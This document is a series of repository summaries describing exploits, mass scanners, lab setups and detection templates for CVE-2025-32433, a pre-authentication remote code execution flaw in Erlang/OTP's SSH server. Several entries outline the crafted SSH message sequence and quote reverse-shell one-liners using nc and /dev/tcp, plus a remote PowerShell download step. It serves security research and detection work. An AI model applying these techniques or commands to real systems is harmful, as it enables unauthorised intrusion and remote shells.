Unauthenticated RCE in Erlang/OTP SSH Server

Repository purpose: a Go proof-of-concept exploit for CVE-2025-32433 targeting Erlang/OTP’s SSH daemon, demonstrating pre-auth remote command execution by sending crafted SSH protocol messages. Structure: - main.go: Orchestrates the exploit flow against a hardcoded target (172.17.0.2:2222). It performs: (1) SSH banner exchange, (2) sends SSH_MSG_KEXINIT with selected algorithm lists, (3) opens a "session" channel (SSH_MSG_CHANNEL_OPEN), then (4) sends a pre-auth SSH_MSG_CHANNEL_REQUEST of type "exec" containing an Erlang expression that runs an OS command. Default command is `touch /tmp/pwned`. - ssh_exploit/*: Implements the low-level SSH message crafting: - 01_banner.go: Sends a fixed client banner and reads the server banner. - 02_kexinit.go: Builds SSH_MSG_KEXINIT (type 20) with specific kex/hostkey/cipher/mac/compression lists. - 03_channel_open.go: Builds SSH_MSG_CHANNEL_OPEN (type 90) for a "session" channel. - 04_send_channel_request.go: Builds SSH_MSG_CHANNEL_REQUEST (type 98) with request "exec" and embeds the command string. - utils/*: Helpers for SSH binary encoding and transport: - send_ssh_packet.go: Wraps payloads into padded SSH packets (packet_length, padding_length, payload, zero padding). - write.go: SSH string and name-list encoders. - format_erlang_cmd.go: Encodes an OS command as base64 and wraps it in Erlang `os:cmd(binary_to_list(base64:decode("..."))).` to reduce escaping issues. - read_response.go: Attempts to read a server response with a short timeout; lack of response is treated as expected. - docker_config/*: A lab environment to run an Erlang OTP SSH daemon in a container: - Dockerfile: Builds an Erlang 27.3.2-slim image, generates host keys, exposes 2222. - start_ssh.escript: Starts ssh:daemon(2222, ...) with password/publickey auth enabled and a configured root:password credential. - readme.md: Instructions to build/run the container and run the Go exploit; also shows how to SSH in and verify /tmp/pwned. Exploit capabilities: - Network-based, unauthenticated (pre-auth) command execution attempt by sending an "exec" channel request before authentication completes. - Payload is currently a simple marker-file creation, but the code supports arbitrary command strings (wrapped as Erlang code) by changing the input to FormatErlangCommand. Notable targeting/assumptions: - The exploit is hardcoded to a Docker bridge IP and port; it is not parameterized. - It does not implement full SSH key exchange/encryption; it relies on the vulnerability being reachable with these minimal message sequences and the server accepting/processing the pre-auth channel request.

Repository purpose: a small lab PoC for CVE-2025-32433 demonstrating pre-auth SSH message handling abuse by sending SSH transport packets (banner, KEXINIT, CHANNEL_OPEN, then CHANNEL_REQUEST/exec) before authentication. Key files: - CVE-2025-32433.py: Main Python PoC. Opens a TCP connection to HOST/PORT (defaults 127.0.0.1:2222), sends a client banner, crafts a minimal SSH_MSG_KEXINIT with specific algorithm lists, then sends SSH_MSG_CHANNEL_OPEN followed by SSH_MSG_CHANNEL_REQUEST with request type "exec" and an Erlang expression payload. Packets are framed with SSH-style length + padding via pad_packet(). The intended effect is a server-side file write to /lab.txt ("pwned"), indicating pre-auth command execution/message injection. - ssh_server.erl: Minimal Erlang SSH daemon wrapper listening on port 2222 using ssh:daemon/2 with password auth enabled and a pwdfun that always returns true (accepts any credentials). This is a lab server harness; it does not itself show the vulnerable handler, but provides a runnable SSH endpoint. - Dockerfile: Builds a reproducible environment on Debian bookworm, compiles Erlang/OTP from source (checks out OTP-26.2.5.10), compiles ssh_server.erl, generates RSA host keys in /root/ssh_keys, exposes 2222, and starts the Erlang node running ssh_server:start. - README.md: Brief description framing the script as controlled lab testing/research. - .github/workflows/pylint.yml: CI linting only. Exploit capabilities (as implemented): network-based pre-auth interaction with an SSH server; crafts and sends specific SSH message types to attempt triggering pre-auth processing of an exec request. Payload is a hardcoded Erlang expression aimed at writing a file, serving as a safe indicator of code execution if the target is vulnerable.

Repository contains a single Python exploit script and a short README. - Purpose: Exploit CVE-2025-32433 (improper access control/authentication bypass) in Erlang/OTP’s SSH-related remote command handling to achieve unauthenticated remote code execution. - Core technique: Implements a minimal SSH message flow over raw TCP sockets (sends an SSH identification string, then crafted SSH packets: KEXINIT, CHANNEL_OPEN for a "session" channel, and CHANNEL_REQUEST of type "exec"). The "exec" command is an Erlang expression. - Payload handling: - `-c/--command`: wraps an OS command into Erlang `os:cmd(...)` after base64-encoding the command to reduce quoting issues. - `-e/--erlang`: sends raw Erlang code directly. - `--reverse LHOST LPORT`: generates a reverse shell one-liner chain that tries python3, then python, then bash `/dev/tcp`. - Notable implementation details: - Uses `pad_packet()` to build SSH binary packets with padding. - Hardcodes the client banner to `SSH-2.0-OpenSSH_8.9`. - Does not implement full SSH key exchange/authentication; it relies on the vulnerability allowing command execution without proper authentication. Overall, this is an operational network RCE PoC/exploit with a built-in reverse shell payload generator, intended to be run directly as `python3 Erlang_SSH_RCE.py` against a vulnerable SSH endpoint.

Repository contains a single Python proof-of-concept exploit (CVE-2025-32433.py) plus a README. The script performs a minimal SSH handshake sequence over a raw TCP socket: it sends a client banner, transmits a crafted SSH_MSG_KEXINIT, opens a session channel (SSH_MSG_CHANNEL_OPEN), then sends an SSH_MSG_CHANNEL_REQUEST of type "exec". The "command" field of the exec request is not a normal shell command; it is wrapped by escape_shell_command_for_erlang() into an Erlang expression that branches on os:type() and calls os:cmd(...) to execute either a Windows command or a Unix bash command. Operator interaction is via stdin prompt for the command to run. The exploit includes basic SSH packet framing/padding (pad_packet) but does not implement full key exchange or encryption, indicating it targets a server-side parsing/logic flaw reachable pre-auth/early in the SSH protocol flow (as implied by the CVE claim). README provides example post-exploitation steps for Windows: using Erlang inets/httpc to download a PowerShell script from an attacker-controlled HTTP server and writing it to C:/Users/Public/shell.ps1, then executing it with PowerShell bypass flags.

This repository contains a Python exploit for CVE-2025-32433, a critical unauthenticated remote code execution vulnerability in the Erlang/OTP SSH server (prior to OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20). The exploit works by sending a crafted SSH channel request containing an Erlang payload that triggers the target to execute a reverse shell command using netcat. The attacker must specify their own IP and port (LHOST/LPORT) to receive the shell, and the target's SSH server IP and port (RHOST/RPORT). The exploit script is self-contained, with clear argument parsing and status output. The README provides detailed usage instructions, prerequisites, and background on the vulnerability. The only code file is 'CVE-2025-32433.py', which is the main entry point. The exploit is operational and provides a working reverse shell if the target is vulnerable and accessible.

This repository contains a Python exploit script (exploit.py) targeting the Erlang/OTP SSH vulnerability CVE-2025-32433. The exploit allows for pre-authentication remote code execution by abusing a channel creation flaw in the SSH service. The script is interactive, prompting the user for the target IP, port, and desired action (reverse shell or safe file write). For the reverse shell, the payload uses bash to connect back to the attacker's machine via TCP. For safe testing, the script writes a file to /tmp/erlang_test on the target. The README provides detailed usage instructions and emphasizes ethical use within the TryHackMe lab environment. The repository is structured with a single code file (exploit.py), a README, and a license. No automated scanning or worm-like behavior is present; the exploit is intended for educational and controlled lab use.

This repository contains a Python exploit (exploit.py) and a README.md for CVE-2025-32433, a pre-authentication remote code execution vulnerability in Erlang/OTP's SSH server. The exploit script connects to a list of target SSH servers (provided via a file), crafts and sends a series of SSH protocol packets to trigger the vulnerability, and executes an arbitrary Erlang command on the target. By default, the payload writes a file ('/tmp/pwned.txt') to the target system, but the command can be customized via a command-line argument. The exploit is multi-threaded and logs results to a specified output file. The main attack vector is network-based, targeting SSH servers on a configurable port (default 2222). The only fingerprintable endpoint in the code is the file '/tmp/pwned.txt', which is used as a marker for successful exploitation. The repository is structured simply, with the exploit logic contained in a single Python file and usage instructions in the README.

This repository contains a Python exploit script (exploit.py) and a brief README for CVE-2025-32433, targeting OpenSSH 8.9. The exploit abuses the SSH protocol by sending crafted packets (SSH_MSG_KEXINIT, SSH_MSG_CHANNEL_OPEN, and SSH_MSG_CHANNEL_REQUEST) in a pre-authentication state to trigger remote code execution. The payload is a bash reverse shell that connects back to the attacker's machine (IP and port configurable in the script). The README provides minimal usage instructions, suggesting the use of netcat to catch the shell. The exploit is operational, requiring the attacker to set up a listener and adjust the target and callback IPs/ports as needed. No detection or fake code is present; the script is a direct exploit for the specified vulnerability.

This repository contains a single Python exploit script (exploit.py) targeting an SSH server, likely OpenSSH 8.9 or similar, running on 127.0.0.1:2222. The script crafts and sends raw SSH protocol packets to the server, including a pre-auth channel request with a malicious command payload. The payload attempts to execute a shell command on the target that creates a reverse shell to the attacker's machine (10.10.16.4:8888) and also connects to 10.10.16.4:6666. The exploit demonstrates a deep understanding of the SSH protocol, manually constructing KEXINIT, CHANNEL_OPEN, and CHANNEL_REQUEST messages. The script is operational and, if the target is vulnerable, would provide the attacker with a shell on the target system. The only file in the repository is exploit.py, written in Python, and it is self-contained with no external dependencies.

This repository provides a comprehensive exploit and detection toolkit for CVE-2025-32433, a critical pre-authentication remote code execution vulnerability in the Erlang/OTP SSH server. The exploit leverages a flaw in SSH protocol message handling, allowing unauthenticated attackers to send SSH_MSG_CHANNEL_OPEN and SSH_MSG_CHANNEL_REQUEST messages before authentication, resulting in arbitrary command execution on the target system. The repository includes: - Multiple exploit scripts: 'test.py' (main exploit and PoC), 'mass-check/mass_check.py' (Python mass scanner), and 'mass-check/active_go.go' (Go-based mass scanner), all of which implement the exploit logic and can be used to test single or multiple targets. - Detection templates: 'mass-check/active.yaml' (active nuclei-style template) and 'mass-check/passive.yaml' (passive banner-based detection), suitable for integration with automated scanners. - Docker environments for vulnerable and patched versions of Erlang/OTP SSH server, allowing for local testing and validation. - Lists of live targets and CPEs for mass scanning and identification. - A detailed write-up ('write-up.md') explaining the vulnerability, exploitation steps, affected versions, and mitigation. The exploit scripts work by connecting to the target SSH service (typically on ports 22, 2222, 7777, 7778, 2024, 8822, 8989, 5000, 6969), sending crafted SSH protocol messages to bypass authentication, and executing arbitrary Erlang or OS commands. Out-of-band DNS logging (via http://www.dnslog.cn) is used to verify successful exploitation. The repository is operational and provides both exploitation and detection capabilities for this high-impact vulnerability.

This repository provides a comprehensive exploitation and detection toolkit for CVE-2025-32433, a critical unauthenticated remote code execution vulnerability in the SSH server implementation of Erlang/OTP (affecting versions OTP 27 < 27.3.3, OTP 26 < 26.2.5.11, OTP 25 < 25.3.2.20). The structure includes: - POC/CVE-2025-32433.py: A Python proof-of-concept exploit that crafts and sends SSH protocol packets (KEXINIT, CHANNEL_OPEN, CHANNEL_REQUEST) to a target server, triggering arbitrary code execution before authentication. The default payload writes a file ('/lab.txt') to the server, demonstrating RCE. - babyfon/babyfon.py: A multithreaded Python scanner for mass exploitation/detection, which sends a similar exploit but uses a DNS callback (via interactsh) to confirm code execution across multiple targets efficiently. - POC/ssh_server.erl and POC/Dockerfile: Provide a vulnerable Erlang SSH server environment for testing, including setup instructions and a minimal server implementation. - nuclei-template/erlang-active.yaml and nuclei-template/erlang-passive.yaml: Nuclei templates for active and passive detection of the vulnerability. The active template attempts exploitation and confirms via DNS callback, while the passive template checks SSH banners and version numbers for vulnerability. - README.md: Contains detailed technical analysis, affected versions, industry impact, and usage instructions for all tools and templates. The main exploit vector is network-based, targeting exposed SSH services (commonly on port 2222, but also 22, 8022, 2022). The exploit does not require authentication and can be used for both direct exploitation (file write, command execution) and detection (DNS callback). The repository is well-structured for both research and practical exploitation/detection scenarios.

This repository contains a proof-of-concept exploit for CVE-2025-32433, a critical unauthenticated remote code execution vulnerability in the Erlang/OTP SSH server. The exploit is implemented in a single Python script (CVE-2025-32433-dbs.py) and is accompanied by a detailed README.md. The exploit works by crafting and sending specific SSH protocol messages to a vulnerable server, ultimately triggering execution of a bash reverse shell payload. The attacker must specify the target's IP and SSH port, as well as their own IP and port to receive the reverse shell. The exploit does not require authentication and targets OTP-27.3.3 and earlier, OTP-26.2.5.11 and earlier, and OTP-25.3.2.20 and earlier. The repository is well-structured, with clear usage instructions and references. No hardcoded IPs or domains are present; all endpoints are user-supplied at runtime.

This repository contains a proof-of-concept exploit for CVE-2025-32433, a remote code execution vulnerability in the Erlang/OTP SSH daemon. The exploit leverages improper handling of pre-authentication SSH channel requests, allowing an attacker to execute arbitrary commands on the target system before authentication. The repository consists of two files: a README.md with detailed usage instructions and vulnerability background, and exploit.py, a Python script that crafts and sends the necessary SSH packets to trigger the vulnerability. The script connects to the target SSH service (default 127.0.0.1:2222), performs a partial SSH handshake, and sends a malicious channel request containing an Erlang command. By default, the payload writes 'pwned' to /lab.txt, but it can be modified to execute arbitrary commands, including spawning a reverse shell. The exploit is a standalone proof-of-concept and not part of any framework. It is intended for research and educational purposes only.

This repository provides a working Proof-of-Concept (PoC) exploit for CVE-2025-32433, a critical unauthenticated remote code execution vulnerability in the Erlang/OTP SSH server. The repository contains four files: a Dockerfile for building a vulnerable test environment, a README.md with detailed usage and vulnerability information, a Python exploit script (cve_2025_32433_exploit.py), and an Erlang SSH server implementation (ssh_server.erl). The exploit works by sending crafted SSH protocol messages (SSH_MSG_CHANNEL_OPEN and SSH_MSG_CHANNEL_REQUEST) during the pre-authentication phase, allowing arbitrary Erlang or system commands to be executed on the target without valid credentials. The Python script can be run interactively or with command-line arguments, supporting both file creation (e.g., /tmp/note.txt) and reverse shell payloads. The default vulnerable server listens on TCP port 2222, as set in ssh_server.erl and the Dockerfile. The repository is structured for easy testing: the Dockerfile builds and runs a vulnerable Erlang/OTP SSH server, and the exploit script targets this server. The exploit is a true remote code execution PoC, not a detection script, and demonstrates the full impact of the vulnerability. No hardcoded IPs or domains are present, but the exploit targets any accessible host running the vulnerable SSH daemon on the specified port.

This repository provides a working proof-of-concept (PoC) exploit for CVE-2025-32433, targeting a vulnerability in a custom SSH server implemented in Erlang/OTP 26.2.5.10. The main exploit script (CVE-2025-32433.py) crafts and sends a sequence of raw SSH protocol messages to a target SSH server (default 127.0.0.1:2222), exploiting a flaw that allows pre-authentication command execution. The payload writes the string 'pwned' to '/lab.txt' on the server, demonstrating arbitrary file write capability. The repository includes a Dockerfile to build a vulnerable test environment, compiling the custom SSH server (ssh_server.erl) and generating the necessary SSH keys. The README provides a brief description and a link to a blog post. The exploit demonstrates a network-based attack vector and is structured as a PoC, requiring the target to run the provided vulnerable SSH server configuration.

This repository contains a Python 3 script (elaina_cve2025_32433.py) and a README file. The script is a scanner and exploit tool for CVE-2025-32433, a pre-authentication remote code execution vulnerability in Erlang/OTP SSH services. It can scan single or multiple IP addresses (from a file) to detect vulnerable SSH services by checking for 'Erlang' or 'OTP' in the SSH banner. If a target is found to be vulnerable, the script can attempt exploitation by sending a crafted message via the SSH protocol, resulting in arbitrary command execution (default: creating a file on the target, but customizable via the --payload option). The tool supports outputting results to the console or to a JSON file. The attack vector is network-based, targeting TCP port 22 (SSH). The script is operational and provides a working exploit with customizable payloads, but does not appear to be part of a larger exploitation framework.

This repository contains a Python exploit script (erLang.py) targeting a critical pre-authentication remote command execution vulnerability in Erlang-based SSH servers, similar to CVE-2025-32433. The exploit works by emulating an SSH client, initiating a raw TCP connection, and sending crafted SSH handshake and channel packets to trigger the vulnerability before authentication. The script supports both single-target and batch modes, with input files (ips.txt and ports.txt) for bulk scanning. The default payload writes a file ('/lab.txt') to the target, but users can specify custom commands or a reverse shell. Results are logged to results.txt. The code is multithreaded for efficiency and includes logging and progress bar support. The repository is structured with a single main exploit script, a README with usage instructions, and template files for input. No hardcoded network endpoints are present; targets are user-supplied.

This repository provides a working exploit for CVE-2025-32433, a critical remote code execution vulnerability in Erlang/OTP's SSH server (versions <=27.3.2, <=26.2.5.10, <=25.3.2.19). The exploit is implemented as a Python script ('exploit') that crafts a malformed SSH handshake to bypass authentication and trigger the vulnerability, resulting in remote code execution. Upon successful exploitation, the script delivers a reverse shell payload ('nc {lhost} {lport} -e /bin/bash'), connecting back to the attacker's specified host and port. The repository includes a Docker setup guide to create a vulnerable lab environment, demonstrating the exploit against a test instance running on port 2222/tcp (example IP: 172.17.0.2). The exploit is operational, requiring the attacker to specify the target's address and port, as well as their own listener details. The main code file is 'exploit', written in Python, and leverages the 'pwntools' library for network interactions. The exploit does not belong to a known framework and is a standalone operational exploit script.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-32433, a vulnerability in the Erlang/OTP SSH server implementation. The vulnerability allows unauthenticated remote code execution by sending SSH messages with IDs >= 80 during the pre-authentication phase, which should not be accepted by the server. The repository contains three files: a Dockerfile to set up a vulnerable Erlang/OTP SSH environment, a README.md with detailed research and context, and exploit.py, a Python script that sends a crafted SSH message (ID 80) to a target server (default 127.0.0.1:2222). The exploit demonstrates the vulnerability by checking if the server responds to the invalid message, indicating it is vulnerable. No weaponized payload is included; the code is a PoC for detection and demonstration purposes.

This repository contains a Python exploit script (erLang.py) targeting a critical pre-authentication remote code execution vulnerability in Erlang-based SSH servers (CVE-2025-32433). The exploit works by emulating an SSH client, initiating a raw TCP connection, and sending crafted SSH handshake and channel packets to trigger the vulnerability before authentication. It supports both single-target and batch modes, reading IPs and ports from ips.txt and ports.txt, and can execute arbitrary commands on the target, such as writing a file (/lab.txt) or launching a reverse shell. The script is multithreaded for efficiency, logs results to results.txt, and provides a progress bar. The repository structure is simple: the main exploit code (erLang.py), a README with usage instructions, and empty template files for batch input. The exploit is operational, providing real remote code execution if the target is vulnerable.

This repository contains a simple proof-of-concept exploit written in Python, consisting of two files: 'exploit.py' and 'main.py'. The main entry point is 'main.py', which prompts the user for a target IP address, port, and a command to send. It then uses the SSH class from 'exploit.py' to establish a raw TCP connection to the specified host and port, prints the initial response from the server, and sends the user-supplied command. The exploit does not implement any authentication or protocol logic beyond basic socket communication, and is designed to interact with a service that responds to raw TCP connections and accepts commands. No hardcoded endpoints or product targeting is present; all targeting is user-supplied at runtime. The code serves as a basic framework for sending arbitrary commands to a network service, and its effectiveness depends on the nature of the service running on the target port.

This repository contains a working exploit for CVE-2025-32433, a critical unauthenticated remote code execution vulnerability in the Erlang/OTP SSH server. The exploit is implemented in Python (exploit.py) and leverages a flaw in the SSH protocol handling, allowing an attacker to send crafted SSH messages before authentication. The attacker can inject and execute arbitrary Erlang code, which is used here to run a bash reverse shell payload (os:cmd("bash -i >& /dev/tcp/<lhost>/<lport> 0>&1")). The exploit requires only network access to the target's SSH port (default 22) and does not require valid credentials. The README and concept files provide a detailed technical overview and usage instructions. The exploit is operational and provides a reverse shell to the attacker if the target is vulnerable. The main fingerprintable endpoints are the target's SSH port and the reverse shell connection to the attacker's specified host and port.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-32433, a critical unauthenticated remote code execution vulnerability in Erlang/OTP SSH. The repository contains three files: 1. docker-compose.yml: Defines a Docker service running a vulnerable Erlang/OTP SSH instance, exposing port 2222 for testing. 2. erlang-scan.py: A Python script that scans a target IP for SSH services on common ports and reports if the SSH banner indicates an Erlang implementation. This is a detection tool to identify potentially vulnerable targets. 3. poc.py: The main exploit script. It connects to the target's SSH service (default port 2222), performs a partial SSH handshake, and sends a crafted payload that executes an arbitrary Erlang command pre-authentication. The default payload writes a file ('/lab.txt') to the target, demonstrating code execution. The exploit is network-based, requiring only access to the SSH service. It does not require authentication. The PoC is operational and demonstrates the vulnerability, but payload customization is manual (via command-line argument). The repository is structured for ease of testing, with both detection and exploitation scripts included.

This repository contains a Go-based exploit for CVE-2025-32433, a critical vulnerability in the Erlang/OTP SSH server implementation. The exploit leverages a flaw in SSH protocol message handling, allowing an attacker to send connection protocol messages (such as SSH_MSG_CHANNEL_OPEN and SSH_MSG_CHANNEL_REQUEST) before authentication, thereby bypassing the authentication step entirely. The main exploit logic is implemented in 'exploit.go'. The exploit connects to the target SSH server over TCP, performs a partial SSH handshake, and then sends a crafted channel request containing a command payload. The payload can be either a direct command (executed via Erlang's os:cmd/1) or a reverse shell command that connects back to the attacker's machine. The exploit supports both Linux and Windows targets via cross-compilation (Makefile provided). The README.md provides detailed usage instructions, including how to run the exploit for both direct command execution and reverse shell scenarios. It also explains the underlying vulnerability and references the relevant SSH RFCs and the upstream fix in Erlang/OTP. No hardcoded IPs or domains are present; all endpoints are supplied at runtime. The exploit is operational and provides real remote code execution on vulnerable targets. The repository is well-structured, with clear separation between code, documentation, and build instructions.

This repository provides a proof-of-concept exploit for CVE-2025-32433, a remote code execution vulnerability in the Erlang/OTP SSH server (version 26.2.5.10). The repository contains four files: a Dockerfile to build a vulnerable environment, a Python exploit script (cve-2025-32433.py), an Erlang SSH server implementation (ssh_server.erl), and a README.md with usage instructions. The Dockerfile sets up a Debian-based container, compiles the vulnerable Erlang/OTP version, and runs the custom SSH server on port 2222 with a generated RSA key. The Erlang server disables authentication and listens for SSH connections. The Python script interacts with the SSH server, performing a minimal SSH handshake and sending a crafted CHANNEL_REQUEST to execute arbitrary shell commands on the server. The default payload opens a reverse shell to the attacker's machine. The exploit demonstrates successful RCE by connecting to the server and obtaining a root shell. The repository is operational and provides all necessary components to reproduce and exploit the vulnerability in a controlled environment.

This repository provides a working exploit and simulation environment for CVE-2025-32433, a pre-authentication remote code execution vulnerability in Erlang/OTP's SSH service. The main exploit script, 'Eerling_cve.py', connects to a target's SSH port (22), sends a crafted SSH version string and a malicious packet, and then attempts to trigger a reverse shell back to the attacker's machine. Post-exploitation is simulated by running system commands and writing fake credentials to '/tmp/exfil.log'. The repository also includes: - 'poc_erlang_test.py': A simulated version of the exploit that can either trigger a real reverse shell (with '--real') or send a callback to a configurable C2 server for safe testing. - 'c2_server.py': A simple Flask-based C2 server that receives POST callbacks from bots or test scripts and logs them to 'log.txt'. - 'test_callback.py': A script to test the callback mechanism to the C2 server. - 'README.md': Detailed setup instructions for both real and simulated testing, including ethical usage warnings and lab environment setup. The exploit is operational and can be used for both real-world exploitation (with caution and authorization) and safe simulation in a controlled lab. The code is written in Python and uses standard libraries, with some scripts requiring the 'requests' and 'flask' modules. The repository contains several fingerprintable endpoints, including hardcoded IP addresses for targets, attackers, and C2 servers, as well as file paths for simulated exfiltration logs.

This repository provides a functional proof-of-concept exploit for CVE-2025-32433, a critical unauthenticated remote code execution vulnerability in the Erlang/OTP SSH server. The main exploit script, 'cve-2025-32433.py', is a Python tool that can: - Check if a target is vulnerable by sending crafted SSH protocol messages and observing the response. - Execute arbitrary commands on a vulnerable target by abusing the SSH protocol flaw. - Launch a bash-based reverse shell from the target to an attacker-controlled host and port. The script supports both single-target and batch scanning (via a file of hosts), and can output results to a file. It interacts directly with the SSH service over TCP (default port 22), requiring only network access to the target. The payload leverages Erlang's os:cmd to execute bash commands, including a reverse shell. The repository is well-structured, with a single exploit script, a README providing usage instructions and vulnerability details, and standard project files (.gitignore, LICENSE).

This repository contains a Metasploit module (ssh_erlangotp_rce.rb) that exploits CVE-2025-32433, a pre-authentication remote code execution vulnerability in Erlang/OTP SSH servers. The exploit works by sending crafted SSH protocol packets to the target, leveraging a flaw in the SSH message handling to execute arbitrary commands via the Erlang os:cmd function without authentication. The module supports both Linux and Unix targets and can deliver payloads such as Meterpreter reverse shells or command shells. The repository also includes Dockerfiles and Erlang source files to build both a vulnerable and a patched SSH server for testing. The vulnerable server listens on TCP port 2222, while the patched version listens on 2223. The exploit is weaponized and integrated into the Metasploit framework, allowing for automated exploitation and payload delivery. The main exploit file is 'ssh_erlangotp_rce.rb', which contains all logic for detection, exploitation, and payload execution. The repository is well-structured for both demonstration and testing of the vulnerability, providing clear instructions and references for further information.

This repository contains a single C exploit (CVE-2025-32433.c) and a README. The exploit targets a remote code execution vulnerability in the SSH server component of Erlang/OTP (CVE-2025-32433). The vulnerability allows an attacker to send crafted SSH protocol messages before authentication, exploiting a flaw in message handling. The exploit connects to the target SSH server (default 127.0.0.1:2222), performs a partial SSH handshake, and sends a specially crafted SSH_MSG_CHANNEL_REQUEST message that triggers execution of a bash reverse shell command on the target. The payload opens a reverse shell to 127.0.0.1:443 by default, but this can be modified. The exploit is operational and demonstrates remote code execution, but is not weaponized for mass exploitation. The README provides a brief description and compilation instructions for Linux. No external framework is used; the code is standalone.

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-32433, a critical unauthenticated remote code execution vulnerability in the Erlang/OTP SSH server. The main exploit file, 'CVE-2025-32433.py', is a Python script that uses the Paramiko SSH client library to connect to a vulnerable SSH server (typically on TCP port 2222) and sends a crafted command to trigger the vulnerability, resulting in arbitrary OS command execution on the server. The payload demonstrated is the creation of a temporary file via the 'mktemp' command, executed through Erlang's 'os:cmd'. The repository also includes: - 'README.md' with background, references to related Nuclei templates, and a description of included IDS logs and rules. - 'bro.log' and 'eve.json', which are Zeek and Suricata IDS logs capturing exploit and normal traffic for analysis and detection purposes. - 'suricata.rules', which contains custom Suricata IDS rules to detect exploitation attempts of this vulnerability by matching on specific SSH message types and content. The exploit is a PoC and requires the attacker to connect to the target SSH server. The included IDS logs and rules are intended to help defenders detect exploitation attempts. The repository is structured for both offensive security research (demonstrating the exploit) and defensive purposes (providing detection artifacts).

This repository provides a working proof-of-concept (PoC) exploit for CVE-2025-32433, targeting a vulnerability in the Erlang/OTP SSH daemon (tested on version 26.2.5.10). The main exploit script (CVE-2025-32433.py) crafts and sends a sequence of raw SSH protocol packets to a target SSH server, exploiting a flaw that allows pre-authentication command execution. The default payload writes the string 'pwned' to /lab.txt on the target, demonstrating arbitrary file write/code execution. The repository includes: - CVE-2025-32433.py: The exploit script, written in Python, which connects to the target SSH server (default 127.0.0.1:2222) and sends crafted packets to trigger the vulnerability. - ssh_server.erl: An Erlang implementation of a vulnerable SSH server, used for local testing. It starts an SSH daemon on port 2222 with a permissive password authentication function. - Dockerfile: Sets up a Debian-based environment, builds the specific Erlang/OTP version, compiles the test server, and generates SSH keys for the daemon. - README.md: Brief documentation and a link to a blog post for further details. The exploit is a network-based attack, requiring the attacker to connect to the target's SSH port. The endpoints of interest are the target IP/port (default 127.0.0.1:2222) and the file /lab.txt, which is created as a result of successful exploitation. The PoC demonstrates the vulnerability but does not provide a weaponized or customizable payload beyond the file write command.